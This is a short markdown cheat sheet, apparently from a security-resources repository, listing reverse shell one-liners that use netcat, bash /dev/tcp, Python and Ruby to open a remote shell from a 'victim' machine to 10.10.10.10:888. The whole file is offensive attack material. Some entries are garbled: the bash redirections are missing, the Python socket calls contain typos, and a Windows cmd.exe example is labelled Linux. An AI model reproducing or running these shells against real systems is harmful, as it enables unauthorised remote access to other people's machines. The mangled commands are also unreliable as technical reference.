cyber-security-resources/useful_commands_and_scripts/reverse_shells.md
2018-01-18 18:57:24 -05:00

22 lines
1.1 KiB
Markdown

# Reverse Shell Commands
The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems.
## Netcat Linux Reverse Shell
`nc 10.10.10.10 888 -e /bin/sh`
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
## Netcat Linux Reverse Shell
`nc 10.10.10.10 888 -e cmd.exe`
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
## Using Bash
`bash -i & /dev/tcp/10.10.10.10/888 0 &1`
## Using Python
`python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'`
## Using Ruby
`ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'`